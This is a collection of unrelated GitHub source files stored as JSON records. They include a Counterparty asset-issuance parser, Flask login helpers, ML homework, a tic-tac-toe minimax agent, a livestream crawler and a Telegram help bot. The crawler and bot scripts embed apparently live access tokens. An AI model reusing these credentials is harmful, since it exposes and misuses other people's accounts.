'{}p'.format(len(message) - asset_format_length)\n else:\n curr_format = asset_format + '{}s'.format(len(message) - asset_format_length)\n \n lock = None\n reset = None\n if (asset_format_length <= 19):# callbacks parameters were removed\n asset_id, quantity, divisible, lock, reset, description = struct.unpack(curr_format, message)\n callable_, call_date, call_price = False, 0, 0.0\n elif (asset_format_length <= 26):#the reset param didn't even exist\n asset_id, quantity, divisible, callable_, call_date, call_price, description = struct.unpack(curr_format, message)\n elif (asset_format_length <= 27):# param reset was inserted\n asset_id, quantity, divisible, reset, callable_, call_date, call_price, description = struct.unpack(curr_format, message)\n elif (asset_format_length <= 28):# param lock was inserted\n asset_id, quantity, divisible, lock, reset, callable_, call_date, call_price, description = struct.unpack(curr_format, message)\n \n call_price = round(call_price, 6) # TODO: arbitrary\n try:\n description = description.decode('utf-8')\n except UnicodeDecodeError:\n description_data = description\n description = ''\n if description_data[0:1] == DESCRIPTION_MARK_BYTE:\n try:\n if description_data[1:].decode('utf-8') == DESCRIPTION_NULL_ACTION:\n description = None\n except UnicodeDecodeError:\n description = '' \n else:\n if len(message) != LENGTH_1:\n raise exceptions.UnpackError\n asset_id, quantity, divisible = struct.unpack(FORMAT_1, message)\n lock, reset, callable_, call_date, call_price, description = False, False, False, 0, 0.0, ''\n try:\n asset = util.generate_asset_name(asset_id, tx['block_index'])\n \n ##This is for backwards compatibility with assets names longer than 12 characters\n if asset.startswith('A'):\n namedAsset = util.get_asset_name(db, asset_id, tx['block_index'])\n \n if (namedAsset != 0):\n asset = namedAsset\n \n if description == None:\n description = util.get_asset_description(db, asset)\n \n status = 'valid'\n except exceptions.AssetIDError:\n asset = None\n status = 'invalid: bad asset name'\n except exceptions.UnpackError as e:\n asset, quantity, divisible, lock, reset, callable_, call_date, call_price, description = None, None, None, None, None, None, None, None, None\n status = 'invalid: could not unpack'\n\n # parse and validate the subasset from the message\n subasset_parent = None\n if status == 'valid' and subasset_longname is not None: # Protocol change.\n try:\n # ensure the subasset_longname is valid\n util.validate_subasset_longname(subasset_longname)\n subasset_parent, subasset_longname = util.parse_subasset_from_asset_name(subasset_longname)\n except exceptions.AssetNameError as e:\n asset = None\n status = 'invalid: bad subasset name'\n\n reissuance = None\n fee = 0\n if status == 'valid':\n call_date, call_price, problems, fee, description, divisible, lock, reset, reissuance, reissued_asset_longname = validate(db, tx['source'], tx['destination'], asset, quantity, divisible, lock, reset, callable_, call_date, call_price, description, subasset_parent, subasset_longname, block_index=tx['block_index'])\n\n if problems: status = 'invalid: ' + '; '.join(problems)\n if not util.enabled('integer_overflow_fix', block_index=tx['block_index']) and 'total quantity overflow' in problems:\n quantity = 0\n\n # Reset?\n if (status == 'valid') and reset and util.enabled(\"cip03\", tx['block_index']):\n balances_cursor = issuance_parse_cursor.execute('''SELECT * FROM balances WHERE asset = ? AND quantity > 0''', (asset,))\n balances_result = balances_cursor.fetchall()\n \n if len(balances_result) <= 1:\n if len(balances_result) == 0:\n issuances_cursor = issuance_parse_cursor.execute('''SELECT * FROM issuances WHERE asset = ? ORDER BY tx_index DESC''', (asset,))\n issuances_result = issuances_cursor.fetchall()\n \n owner_balance = 0\n owner_address = issuances_result[0]['issuer']\n else:\n owner_balance = balances_result[0][\"quantity\"]\n owner_address = balances_result[0][\"address\"]\n \n if owner_address == tx['source']:\n if owner_balance > 0:\n util.debit(db, tx['source'], asset, owner_balance, 'reset destroy', tx['tx_hash'])\n \n bindings = {\n 'tx_index': tx['tx_index'],\n 'tx_hash': tx['tx_hash'],\n 'block_index': tx['block_index'],\n 'source': tx['source'],\n 'asset': asset,\n 'quantity': owner_balance,\n 'tag': \"reset\",\n 'status': \"valid\",\n 'reset': True,\n }\n sql = 'insert into destructions values(:tx_index, :tx_hash, :block_index, :source, :asset, :quantity, :tag, :status)'\n issuance_parse_cursor.execute(sql, bindings)\n \n bindings= {\n 'tx_index': tx['tx_index'],\n 'tx_hash': tx['tx_hash'],\n 'block_index': tx['block_index'],\n 'asset': asset,\n 'quantity': quantity,\n 'divisible': divisible,\n 'source': tx['source'],\n 'issuer': tx['source'],\n 'transfer': False,\n 'callable': callable_,\n 'call_date': call_date,\n 'call_price': call_price,\n 'description': description,\n 'fee_paid': 0,\n 'locked': lock,\n 'status': status,\n 'reset': True,\n 'asset_longname': reissued_asset_longname,\n }\n \n sql='insert into issuances values(:tx_index, :tx_hash, 0, :block_index, :asset, :quantity, :divisible, :source, :issuer, :transfer, :callable, :call_date, :call_price, :description, :fee_paid, :locked, :status, :asset_longname, :reset)'\n issuance_parse_cursor.execute(sql, bindings)\n \n # Credit.\n if quantity:\n util.credit(db, tx['source'], asset, quantity, action=\"reset issuance\", event=tx['tx_hash'])\n\n else:\n if tx['destination']:\n issuer = tx['destination']\n transfer = True\n #quantity = 0\n else:\n issuer = tx['source']\n transfer = False\n\n # Debit fee.\n if status == 'valid':\n util.debit(db, tx['source'], config.XCP, fee, action=\"issuance fee\", event=tx['tx_hash'])\n\n # Lock?\n if not isinstance(lock,bool):\n lock = False\n if status == 'valid':\n if (description and description.lower() == 'lock') or lock:\n lock = True\n cursor = db.cursor()\n issuances = list(cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', asset)))\n cursor.close()\n if description.lower() == 'lock' and len(issuances) > 0:\n description = issuances[-1]['description'] # Use last description\n\n if not reissuance:\n # Add to table of assets.\n bindings= {\n 'asset_id': str(asset_id),\n 'asset_name': str(asset),\n 'block_index': tx['block_index'],\n 'asset_longname': subasset_longname,\n }\n sql='insert into assets values(:asset_id, :asset_name, :block_index, :asset_longname)'\n issuance_parse_cursor.execute(sql, bindings)\n\n if status == 'valid' and reissuance:\n # when reissuing, add the asset_longname to the issuances table for API lookups\n asset_longname = reissued_asset_longname\n else:\n asset_longname = subasset_longname\n\n # Add parsed transaction to message-type–specific table.\n bindings= {\n 'tx_index': tx['tx_index'],\n 'tx_hash': tx['tx_hash'],\n 'block_index': tx['block_index'],\n 'asset': asset,\n 'quantity': quantity,\n 'divisible': divisible,\n 'source': tx['source'],\n 'issuer': issuer,\n 'transfer': transfer,\n 'callable': callable_,\n 'call_date': call_date,\n 'call_price': call_price,\n 'description': description,\n 'fee_paid': fee,\n 'locked': lock,\n 'reset': reset,\n 'status': status,\n 'asset_longname': asset_longname,\n }\n if \"integer overflow\" not in status:\n sql='insert into issuances values(:tx_index, :tx_hash, 0, :block_index, :asset, :quantity, :divisible, :source, :issuer, :transfer, :callable, :call_date, :call_price, :description, :fee_paid, :locked, :status, :asset_longname, :reset)'\n issuance_parse_cursor.execute(sql, bindings)\n else:\n logger.warn(\"Not storing [issuance] tx [%s]: %s\" % (tx['tx_hash'], status))\n logger.debug(\"Bindings: %s\" % (json.dumps(bindings), ))\n\n # Credit.\n if status == 'valid' and quantity:\n util.credit(db, tx['source'], asset, quantity, action=\"issuance\", event=tx['tx_hash'])\n\n issuance_parse_cursor.close()\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"CounterpartyXCP/counterparty-lib","sub_path":"counterpartylib/lib/messages/issuance.py","file_name":"issuance.py","file_ext":"py","file_size_in_byte":34118,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"20"} +{"seq_id":"5794782246","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\nimport os\nfrom flask import Response\n\nfrom utils import constant\n\n\ndef create_response(**kwargs) -> Response:\n \"\"\"\n Create response object\n If response is dict, use response to create Response\n If response is not None, use kwargs to create Response\n \"\"\"\n if kwargs is not None:\n return Response(json.dumps(dict(**kwargs)), mimetype='application/json')\n else:\n response = {\n 'code': 500,\n 'message': '内部错误'\n }\n return Response(json.dumps(response), mimetype='application/json')\n\n\ndef check_password(user, request) -> Response:\n \"\"\"Check user password and add token\"\"\"\n data = request.json\n headers = request.headers\n set_cookie = False\n r = {}\n username = ''\n if 'User-Agent' in headers.keys() and 'python' in headers['User-Agent']:\n if ('username' and 'password') in data.keys() and len(data.keys()) == 2:\n username = data['username']\n if user.is_user(username):\n if user.check_password(username, data['password']):\n r['message'] = '登录成功'\n r['code'] = 0\n set_cookie = True\n user.logger.info(f'用户 {username} 登陆成功')\n else:\n r['message'] = '密码错误'\n r['code'] = -1\n user.logger.info(f'尝试登陆的用户 {username} 密码错误')\n else:\n r['message'] = '用户不存在'\n r['code'] = -2\n user.logger.info(f'尝试登陆的用户名 {username} 不存在')\n else:\n r['message'] = 'Illegal client'\n r['code'] = -3\n else:\n r['message'] = 'Illegal client'\n r['code'] = -3\n response = create_response(**r)\n if set_cookie:\n token = user.session.create_token(username)\n response.set_cookie('session', token)\n user.logger.info(f'为用户 {username} 分配SessionToken {token}')\n return response\n\n\ndef make_log_backup():\n \"\"\"Create log backup on startup\"\"\"\n file_name = constant.LATEST_LOG_FILE\n if os.path.isfile(file_name):\n modify_time = time.strftime('%Y-%m-%d', time.localtime(\n os.stat(file_name).st_mtime))\n counter = 0\n while True:\n counter += 1\n new_file_name = '{}/{}-{}.log'.format(\n os.path.dirname(file_name), modify_time, counter)\n if not os.path.isfile(new_file_name):\n break\n os.rename(file_name, new_file_name)\n\n\ndef json_dumps(d: dict) -> str:\n return json.dumps(d, indent=4, ensure_ascii=False)\n\n\ndef time_fmt(t: int) -> str:\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(t))\n","repo_name":"Andy-Archived-Projects/StudentLeaveSystem","sub_path":"server/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41001808909","text":"#!/usr/bin/env python\n# coding: -utf8\n\nif __name__ == '__main__':\n\n height = input(\"Enter your height(inch): \")\n height = float(height)\n\n weight = input(\"Enter your weight(pound): \")\n weight = float(weight)\n\n bmi = (weight / (height * height)) * 703\n bmi = ((bmi * 10) + 0.5) / 10.0\n\n print(\"Yor BMI is %.1f.\" % bmi)\n if bmi < 18.5:\n print(\"Yor are underweight. You should see your doctor.\")\n elif 18.5 <= bmi <= 25:\n print(\"Yor are whthin the ideal weight range.\")\n else:\n print(\"Yor are overweight. You should see your doctor.\")\n","repo_name":"ifukazoo/LanguageExercises","sub_path":"19_if-elseif/python/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7285714656","text":"import numpy as np\nimport gzip\nimport struct\nimport sys\nsys.path.append('python/')\ntry:\n import needle as ndl\n import needle.ops as ops\nexcept:\n pass\n\n\ndef parse_mnist(image_filename, label_filename):\n \"\"\" Read an images and labels file in MNIST format. See this page:\n http://yann.lecun.com/exdb/mnist/ for a description of the file format.\n\n Args:\n image_filename (str): name of gzipped images file in MNIST format\n label_filename (str): name of gzipped labels file in MNIST format\n\n Returns:\n Tuple (X,y):\n X (numpy.ndarray[np.float32]): 2D numpy array containing the loaded \n data. The dimensionality of the data should be \n (num_examples x input_dim) where 'input_dim' is the full \n dimension of the data, e.g., since MNIST images are 28x28, it \n will be 784. Values should be of type np.float32, and the data \n should be normalized to have a minimum value of 0.0 and a \n maximum value of 1.0. The normalization should be applied uniformly\n across the whole dataset, _not_ individual images.\n\n y (numpy.ndarray[dtype=np.uint8]): 1D numpy array containing the\n labels of the examples. Values should be of type np.uint8 and\n for MNIST will contain the values 0-9.\n \"\"\"\n # BEGIN YOUR CODE\n with gzip.open(image_filename) as f:\n content = f.read()\n magic, length, row, column = struct.unpack(\">iiii\", content[:16])\n X = struct.unpack(\">\"+\"B\"*length*row*column, content[16:])\n X = np.array(X, dtype=np.float32).reshape(length, row*column)\n X = X/X.max()\n\n with gzip.open(label_filename) as f:\n content = f.read()\n magic, length = struct.unpack(\">ii\", content[:8])\n y = struct.unpack(\">\"+\"B\"*length, content[8:])\n y = np.array(y, dtype=np.uint8)\n\n return (X, y)\n\n # END YOUR CODE\n\n\ndef softmax_loss(Z, y_one_hot):\n \"\"\" Return softmax loss. Note that for the purposes of this assignment,\n you don't need to worry about \"nicely\" scaling the numerical properties\n of the log-sum-exp computation, but can just compute this directly.\n\n Args:\n Z (ndl.Tensor[np.float32]): 2D Tensor of shape\n (batch_size, num_classes), containing the logit predictions for\n each class.\n y (ndl.Tensor[np.int8]): 2D Tensor of shape (batch_size, num_classes)\n containing a 1 at the index of the true label of each example and\n zeros elsewhere.\n\n Returns:\n Average softmax loss over the sample. (ndl.Tensor[np.float32])\n \"\"\"\n # BEGIN YOUR SOLUTION\n batch_size = Z.shape[0]\n return ops.summation(ops.log(ops.summation(ops.exp(Z), axes=(1, )))\n - ops.summation(Z * y_one_hot, axes=(1, ))) / batch_size\n # END YOUR SOLUTION\n\n\ndef nn_epoch(X, y, W1, W2, lr=0.1, batch=100):\n \"\"\" Run a single epoch of SGD for a two-layer neural network defined by the\n weights W1 and W2 (with no bias terms):\n logits = ReLU(X * W1) * W2\n The function should use the step size lr, and the specified batch size (and\n again, without randomizing the order of X).\n\n Args:\n X (np.ndarray[np.float32]): 2D input array of size\n (num_examples x input_dim).\n y (np.ndarray[np.uint8]): 1D class label array of size (num_examples,)\n W1 (ndl.Tensor[np.float32]): 2D array of first layer weights, of shape\n (input_dim, hidden_dim)\n W2 (ndl.Tensor[np.float32]): 2D array of second layer weights, of shape\n (hidden_dim, num_classes)\n lr (float): step size (learning rate) for SGD\n batch (int): size of SGD mini-batch\n\n Returns:\n Tuple: (W1, W2)\n W1: ndl.Tensor[np.float32]\n W2: ndl.Tensor[np.float32]\n \"\"\"\n\n # BEGIN YOUR SOLUTION\n num_batches = int(np.ceil(y.shape[0] / batch))\n num_classes = W2.shape[1]\n\n for i in range(num_batches):\n batch_size = batch\n # the last batch\n if y.shape[0] < (i+1)*batch:\n batch_size = y.shape[0] - i*batch\n\n # X_selected is in (batch_size x input_dim)\n # y_selected is in (batch_size)\n X_selected = X[i*batch:i*batch+batch_size]\n y_selected = y[i*batch:i*batch+batch_size]\n\n # convert y_selected to one-hot matrix\n mask = np.zeros((batch_size, num_classes))\n mask[np.arange(batch_size), y_selected] = 1\n mask = ndl.Tensor(mask, requires_grad=False)\n\n X_selected = ndl.Tensor(X_selected)\n loss = softmax_loss(ops.matmul(\n ops.relu(ops.matmul(X_selected, W1)), W2), mask)\n loss.backward()\n W1_numpy, W2_numpy = W1.numpy(), W2.numpy()\n W1_grad, W2_grad = W1.grad.numpy(), W2.grad.numpy()\n # update parameters\n W1_numpy -= W1_grad*lr\n W2_numpy -= W2_grad*lr\n\n W1.data = ndl.Tensor(W1_numpy)\n W2.data = ndl.Tensor(W2_numpy)\n\n return W1, W2\n # END YOUR SOLUTION\n\n# CODE BELOW IS FOR ILLUSTRATION, YOU DO NOT NEED TO EDIT\n\n\ndef loss_err(h, y):\n \"\"\" Helper function to compute both loss and error\"\"\"\n y_one_hot = np.zeros((y.shape[0], h.shape[-1]))\n y_one_hot[np.arange(y.size), y] = 1\n y_ = ndl.Tensor(y_one_hot)\n return softmax_loss(h, y_).numpy(), np.mean(h.numpy().argmax(axis=1) != y)\n","repo_name":"zml72062/CMU-10-714","sub_path":"hw1/apps/simple_ml.py","file_name":"simple_ml.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70910763571","text":"import random\nimport multiprocessing\nimport time\n\nclass Home(multiprocessing.Process):\n def __init__(self, home_pipe, temperature_array):\n multiprocessing.Process.__init__(self)\n self.home_pipe = home_pipe\n self.temperature_array = temperature_array\n \n def run(self):\n while True:\n temperature = self.temperature_array[0]\n self.home_pipe.send((temperature,))\n time.sleep(1)\n \nclass Weather(multiprocessing.Process):\n def __init__(self, temperature_array):\n multiprocessing.Process.__init__(self)\n self.temperature_array = temperature_array\n \n def run(self):\n while True:\n temperature = random.uniform(10, 20)\n self.temperature_array[0] = temperature\n time.sleep(1)\n\nclass External(multiprocessing.Process):\n def __init__(self, event_q, event_coef):\n multiprocessing.Process.__init__(self)\n self.event_q = event_q\n self.event_coef = event_coef\n \n def run(self):\n while True:\n event = random.choice(['law', 'diplomatic_tension', 'social_unrest', 'fuel_shortage'])\n event_coef = 0\n if event == 'law':\n event_coef = random.uniform(-0.05, 0.05)\n elif event == 'diplomatic_tension':\n event_coef = random.uniform(-0.1, 0.1)\n elif event == 'social_unrest':\n event_coef = random.uniform(-0.2, 0.2)\n elif event == 'fuel_shortage':\n event_coef = random.uniform(-0.3, 0.3)\n self.event_q.put((event, event_coef))\n time.sleep(1)\n\nclass Market(multiprocessing.Process):\n def __init__(self, home_pipe, event_q, temperature_array):\n multiprocessing.Process.__init__(self)\n self.home_pipe = home_pipe\n self.event_q = event_q\n self.temperature_array = temperature_array\n self.energy_price = 0.17\n\n def run(self):\n while True:\n temperature, = self.home_pipe.recv()\n event, event_coef = self.event_q.get()\n if temperature != 0:\n energy_price = (0.99 * self.energy_price) + (0.001 * (1/temperature)) + (event_coef)\n else:\n energy_price = (0.99 * self.energy_price) + (event_coef)\n self.energy_price = energy_price\n print(f'Energy price: {energy_price}')\n time.sleep(1)\n\nif __name__ == '__main__':\n home_pipe, home_pipe_other = multiprocessing.Pipe()\n event_q = multiprocessing.Queue()\n temperature_array = multiprocessing.Array('f', [0])\n ###\n home_process = Home(home_pipe, temperature_array)\n home_process.start()\n\n ###\n weather_process = Weather(temperature_array)\n weather_process.start()\n\n ###\n event_coef = 0.01\n external_process = External(event_q, event_coef)\n external_process.start()\n\n ###\n market_process = Market(home_pipe_other, event_q, temperature_array)\n market_process.start()\n\n\n","repo_name":"baptisteParpette/The-Energy-Market-PCC","sub_path":"dimanche/projet_final/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28653530602","text":"def solution(A,B):\n answer = 0\n result1=0\n result2=0\n A.sort(reverse= True)\n B.sort()\n for i in range(len(A)):\n result1+=A[i]*B[i]\n result2+=A[i]*B[len(A)-i-1]\n if result1 >result2:\n return result2\n else:\n return result1","repo_name":"bellday/Baekjoon","sub_path":"프로그래머스/lv2/12941. 최솟값 만들기/최솟값 만들기.py","file_name":"최솟값 만들기.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"32484257378","text":"\nimport time\n\nimport json\n\nfrom numpy import nan_to_num\nfrom numpy import mean\n\ndef update_config(dir):\n with open(\"update.json\",'r') as uc:\n config=json.load(uc)\n with open(\"config.json\",'r') as oc:\n origin_config=json.load(oc)\n \n for k,v in config.items():\n origin_config[k]=v\n with open(\"{}/config.json\".format(dir),'w') as wf:\n json.dump(origin_config,wf,indent=4)\n\n\ndef generate_ip_table(int_ips,mode,N):\n if mode=='remote':\n ip_tables=[]\n if N>len(int_ips):\n raise Exception(f'size of instances error, {N},{len(int_ips)}')\n ip_tables=[f'{ip}\\n' for ip in int_ips[:N]]\n with open(\"ips.txt\",'w') as wf:\n wf.writelines(ip_tables)\n else:\n with open(\"ips.txt\",'w') as wf:\n wf.writelines([f'127.0.0.1\\n' for _ in range(N)])\n \n\n\n\n \n\n\ndef Analyze(config_dir,result_dir,log,N):\n txs=0\n fp=open(\"{}/{}\".format(result_dir, log))\n timelist=[]\n latencys=[]\n blocks=0\n stat={}\n alg=\"\"\n id=''\n for line in iter(fp):\n if \"consensus\" in line:\n id=line.split()[-3]\n alg=line.split(':')[-1]\n if \"committed\" in line:\n a=line.split(' ')[1]+'-'+line.split(' ')[2].split('.')[0]\n st=time.mktime(time.strptime(a,\"%Y/%m/%d-%H:%M:%S\"))\n timelist.append(st)\n commitedtx=line.split(':')[5][:-6]\n txs+=int(commitedtx)\n if int(commitedtx)==0:\n continue\n blocks+=1\n if \"latency\" in line:\n latencys.append(nan_to_num(float(line.split(' ')[-2])))\n if len(timelist)<1:\n print(\"there is no valid log\")\n return None\n duration=timelist[-1]-timelist[0]\n stat['id']=id\n stat['algorithm']=alg[:-1]\n stat['running time(s)']=duration\n stat['txs']=txs\n stat['tps(tx/s)']=int(txs/duration)\n stat['average latency(ms)']=mean(latencys)\n stat['replicas']=N\n print(json.dumps( stat,indent=2))\n stat['latencys']=str(latencys)\n return stat","repo_name":"tncheng/multipipelinehs","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37940925068","text":"from tic_tac_toe.Board import Board, EMPTY, WIN, LOSE, NEUTRAL\n\n\nclass MinMaxAgent:\n cache = {}\n\n def __init__(self):\n self.side = None\n self.result = NEUTRAL\n\n def new_game(self, side):\n self.side = side\n self.result = NEUTRAL\n\n def final_result(self, sess, result):\n self.result = result\n\n def is_trainable(self):\n return False\n\n def _min(self, board):\n # board.print_board()\n board_hash = board.hash_value()\n if board_hash in self.cache:\n return self.cache[board_hash]\n\n winner = board.check_win()\n if winner == self.side:\n return 1, -1\n elif winner == board.other_side(self.side):\n return 0, -1\n\n min = 0.5 # 0.5 means DRAW\n action = -1\n\n for index in [i for i, e in enumerate(board.state) if board.state[i] == EMPTY]:\n b = Board(board.state)\n b.move(index, board.other_side(self.side))\n\n res, _ = self._max(b)\n if res < min or action == -1:\n min = res\n action = index\n if min == 0:\n self.cache[board_hash] = (min, action)\n return min, action\n\n self.cache[board_hash] = (min, action)\n return min, action\n\n def _max(self, board):\n # board.print_board()\n board_hash = board.hash_value()\n if board_hash in self.cache:\n return self.cache[board_hash]\n\n winner = board.check_win()\n if winner == self.side:\n return 1, -1\n elif winner == board.other_side(self.side):\n return 0, -1\n\n max = 0.5 # 0.5 means DRAW\n action = -1\n\n for index in [i for i, e in enumerate(board.state) if board.state[i] == EMPTY]:\n b = Board(board.state)\n b.move(index, self.side)\n\n res, _ = self._min(b)\n if res > max or action == -1:\n max = res\n action = index\n if max == 1:\n self.cache[board_hash] = (max, action)\n return max, action\n\n self.cache[board_hash] = (max, action)\n return max, action\n\n def move(self, sess, board):\n score, action = self._max(board)\n _, res, finished = board.move(action, self.side)\n return res, finished\n","repo_name":"fcarsten/ai_playground","sub_path":"tic_tac_toe/MinMaxAgent.py","file_name":"MinMaxAgent.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14661802261","text":"#!/usr/bin/env python \n__author__ = \"lrtao2010\" \n\n#数据结构:\nmenu = {\n '北京':{\n '海淀':{\n '五道口':{\n 'soho':{},\n '网易':{},\n 'google':{}\n },\n '中关村':{\n '爱奇艺':{},\n '汽车之家':{},\n 'youku':{},\n },\n '上地':{\n '百度':{},\n },\n },\n '昌平':{\n '沙河':{\n '老男孩':{},\n '北航':{},\n },\n '天通苑':{},\n '回龙观':{},\n },\n '朝阳':{},\n '东城':{},\n },\n '上海':{\n '闵行':{\n \"人民广场\":{\n '炸鸡店':{}\n }\n },\n '闸北':{\n '火车站':{\n '携程':{}\n }\n },\n '浦东':{},\n },\n '山东':{},\n}\n\n# for city_name in enumerate(menu.keys()):\n# print(city_name[0],city_name[1])\n# des_city = int(input(\"请选择想要去往的省/直辖市(0|1|2): \"))\n# if des_city == 0:\n# for area_name in enumerate(menu.get(\"北京\")):\n# print(area_name[0],area_name[1])\n# des_area = int(input(\"请选择想要去往的市区(0|1|2|3): \"))\n# if des_area == 0:\n# print(menu.get(\"北京\").get(\"海淀\"))\n# elif des_city == 1:\n# print(2)\n# else:\n# print(3)\n\n# level =[]\n# while True:\n# for key in menu:\n# print(key)\n# your_choice = input(\"your choice >>:\").strip()\n# if your_choice == \"b\":\n# if len(level) == 0:break #当列表空的时候,就是退出大循环的时候\n# menu=level[-1]\n# level.pop() #删除列表最后一个元素,\n# print(level)\n# # break\n# elif your_choice in menu:\n# # print(menu)\n# level.append(menu)\n# # print(level)\n# menu=menu[your_choice]\n# else:\n# continue\n\nif __name__ == '__main__':\n current_layer = menu\n parent_layer = [] #将父级key值放入到列表中\n flags = False #设置标志位\n while not flags:\n for key in current_layer:\n print(key)\n choose = input(\"请选择,输入b返回上一级菜单,输入q退出菜单:\").strip()\n if choose in current_layer:\n parent_layer.append(current_layer) #将当前的状态放入列表中\n current_layer = current_layer[choose]\n elif choose == 'b':\n if parent_layer:\n current_layer = parent_layer.pop()\n elif choose == 'q':\n flags = True\n else:\n print(\"\\033[34;1m输入有误,请重新输入\\033[0m\")","repo_name":"lrtao2017/pythonqzs3","sub_path":"app/task/menu/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72986528688","text":"import requests\n\n\nplatform = {\n 'name': '比艺直播',\n 'id': '13',\n 'img': 'http://1.pic.pc6.com/thumb/up/2017-4/20174178394129036233_160_160.png'\n}\n\n\nclass Router(object):\n def __init__(self):\n self.url = \"http://www.17biyi.cn/biyi-api/biyi/live/getHotRoomList\"\n self.data = 'oauth_signature_method=HMAC-SHA1&oauth_consumer_key=d690ae490693370caa8b37dafb635a79&oauth_version=1.0&oauth_timestamp=1501830578&oauth_nonce=e00362bf9a361bd66f7d5966edc935ee&oauth_token=3026031_95fcbd992e22c6c4307e4e2e3cf1982b&oauth_signature=mKVtnxdJtY8nztZM%2BgsD1IuK3tA%3D'\n self.headers = {\n \"Host\": \"www.17biyi.cn\",\n \"User-Agent\": \"okhttp/2.5.0\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n\n def get_list(self) -> list:\n \"\"\"没有分页\"\"\"\n resp = requests.post(url=self.url,\n data=self.data,\n headers=self.headers)\n ret = []\n rooms = resp.json()['result']\n for room in rooms:\n tmp = dict()\n tmp['pid'] = platform['id']\n tmp['name'] = room[\"nickname\"]\n tmp['rid'] = room['gid']\n tmp['title'] = room['levelTitle']\n tmp['avatar'] = room['face_url']\n tmp['url'] = room['streamAddr']\n\n ret.append(tmp)\n\n return ret\n\n def get_address(self) -> str:\n pass\n\n def xx_crawl(self):\n data = self.get_list()\n print(data)\n\n\ndef main():\n router = Router()\n ls = router.get_list()\n print(ls)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"blademist/py-live","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"17326817624","text":"import telebot\nimport datetime\n\n# Словник з відповідностями англійських назв днів тижня до українських\ndays_of_week = {\n 'Monday': 'Понеділок',\n 'Tuesday': 'Вівторок',\n 'Wednesday': 'Середа',\n 'Thursday': 'Четвер',\n 'Friday': \"П'ятниця\",\n 'Saturday': 'Субота',\n 'Sunday': 'Неділя'\n}\n\n\n#@P33botbot\nbot = telebot.TeleBot('6098126284:AAGkdJt9BGoIkUbBvvp6Mqysuj0ZAmzxd_A')\n\n@bot.message_handler(commands=['start'])\ndef start (message):\n bot.send_message(message.chat.id, f'Привіт {message.from_user.first_name} {message.from_user.last_name}, ось'\n f' довідник по Python.\\n'\n 'Список команд:'\n '\\n Перша ДЗ по боту:' \n '\\n/while'\n '\\n/def'\n '\\n/try'\n '\\n/break'\n '\\n/await'\n '\\n/for'\n '\\n/import'\n '\\n/if'\n '\\n/and'\n '\\n/del'\n '\\n/return'\n '\\nДруга дз по боту, відправка Файлів на текст і дія з часом:'\n '\\n/list'\n '\\n/time'\n '\\nОсобисті команди:'\n '\\n#/calculator', parse_mode='html')\n\n\n@bot.message_handler(commands=['while'])\ndef while_1(message):\n text = 'while Цикл Python використовує ключове слово while і працює як while цикл в інших мовах програмування. ' \\\n 'Поки умова, яка слідує за while ключовим словом, відповідає дійсності, блок, наступний за while оператором,' \\\n ' продовжуватиме виконуватися знову і знову.'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['def'])\ndef def_1(message):\n text = 'Ключове слово Python def використовується для визначення функції або методу класу. Це еквівалентно function' \\\n ' JavaScript і PHP. Основний синтаксис для визначення функції defвиглядає так: \\ndef ():' \\\n '\\n\\t\\t\\t\\t\\t'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['try'])\ndef try_1(message):\n text = 'Будь-який блок обробки винятків починається з ключового слова Python try. Це те ж саме в більшості інших ' \\\n 'мов програмування, які мають обробку винятків. Код у try блоці – це код, який може викликати виключення.' \\\n ' Кілька інших ключових слів Python пов’язані з try і використовуються для визначення того, що слід робити,' \\\n ' якщо виникають різні винятки або в різних ситуаціях.'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['break'])\ndef break_1(message):\n text = 'Ключове break слово. Якщо вам потрібно вийти з циклу раніше, ви можете використати break ключове слово. ' \\\n 'Це ключове слово працюватиме в обох циклах for і while'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['await'])\ndef await_1(message):\n text = 'Ключове слово Python await використовується в асинхронних функціях, щоб визначити точку у функції, де' \\\n ' керування повертається циклу подій для виконання інших функцій. Ви можете використовувати його, ' \\\n 'розмістивши await ключове слово перед викликом будь-якої async функції'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['for'])\ndef for_1(message):\n text = 'Найбільш поширеним циклом у Python є for цикл. Він створений шляхом поєднання ключових слів Python for і' \\\n ' in пояснений раніше. Основний синтаксис циклу for такий: \\nfor in :' \\\n ' \\n\\t\\t\\t\\t\\t'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['import'])\ndef import_1(message):\n text = 'Ключове слово Python import використовується для імпорту або включення модуля для використання у 